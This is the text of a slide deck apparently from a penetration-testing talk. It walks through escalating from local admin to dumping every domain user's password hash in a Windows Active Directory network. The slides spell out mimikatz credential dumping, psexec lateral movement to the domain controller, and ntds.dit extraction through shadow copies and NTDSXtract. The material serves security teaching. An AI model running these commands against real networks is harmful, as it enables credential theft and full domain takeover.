![Page 1: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/1.jpg)
LOCAL ADMIN TO DOMAIN USER HASHES
The Fall of a Domain
Riyaz Wa l i kar
![Page 2: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/2.jpg)
Disclaimer
It was far more painstaking and complicated than this!
Demo setup to show execution path
All the commands were actually used in the pentest
Please do not try this on your office/corporate environment without written permission
![Page 3: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/3.jpg)
Please exercise caution!
![Page 4: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/4.jpg)
The story so far
Remote RDP access to a machine on the client network via VPN
Local Administrator rights to simulate an employee
User is a limited domain user
Domain controller on the same network, reachable with LDAP services running
![Page 5: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/5.jpg)
Visually. This.
![Page 6: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/6.jpg)
Local Admin eh?
Locally logged in as TARDIS\fwhite
Domain limited user but local admin
Other users connected? [Task Manager > Users]
Found another user connected to our system via RDP –sweet! (possibly domain admin )
Need system privs! Any ideas?
![Page 7: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/7.jpg)
Think Sysinternals!
psexec –s –i cmd.exe
![Page 8: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/8.jpg)
Dump connected user credentials
mimikatz – Benjamin Delpy
Extracts plaintext passwords from memory
Wdigest, tspkg, kerberos and many more
mimikatz privilege::debug token::elevate sekurlsa::logonPasswords
![Page 9: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/9.jpg)
Windows (In)Security?
![Page 10: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/10.jpg)
Now what?
http://gapingvoid.com/2008/06/13/now-what/
![Page 11: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/11.jpg)
Remote CMD anyone?
RDP directly!
Lets be discreet
psexec -s –u TARDIS\atomboy \\10.10.10.1 cmd.exe
Game already over!
Instead RDP with user credentials and present report
![Page 12: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/12.jpg)
![Page 13: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/13.jpg)
Lets grab some hashes
Active Directory stores user information in %systemroot%\ntds\ntds.dit
Locked during system usage
ntdsutil + snapshot = backup (> Windows 2008)
vssadmin create shadow /for=C: (> Windows 2003)
![Page 14: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/14.jpg)
Lets grab some hashes
backup readable by nt authority\system and administrators
We need the ntds.dit and SYSTEM files
cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies
copy works!
![Page 15: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/15.jpg)
Core files needed
![Page 16: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/16.jpg)
NTDS.dit structure parse?
NTDSXtract - A framework for offline forensic analysis of ntds.dit
Need the libesedb module as well
libesedb and creddump in ntds_dump_hashes.zip
wget to a linux box (Kali is a good choice)
![Page 17: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/17.jpg)
get framework + compile + make + run
wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip
unzip both
![Page 18: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/18.jpg)
get framework + compile + make + run
cd ntds_dump_hash/libesedb
./configure && make
cd libesedb/esedbtools
./esedbexport -l /tmp/ntds.log <ntds.dit>
![Page 19: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/19.jpg)
Yay!
python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> –passwordhistory <system_file>
Cleanup the output with ntdstopwdump.py(https://raw.github.com/inquisb/
miscellaneous/master/ntdstopwdump.py)
![Page 20: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/20.jpg)
Now what?
http://gapingvoid.com/2008/06/13/now-what/
![Page 21: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/21.jpg)
Pass the hash / Password Cracking!
Use the Windows Credentials Editor – Amplia Security
Password Cracking >> Humla perhaps
![Page 22: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/22.jpg)
References
http://blog.gentilkiwi.com/mimikatzhttp://www.ampliasecurity.com/research/
wcefaq.htmlhttp://bernardodamele.blogspot.in/2011/12/
dump-windows-password-hashes_16.html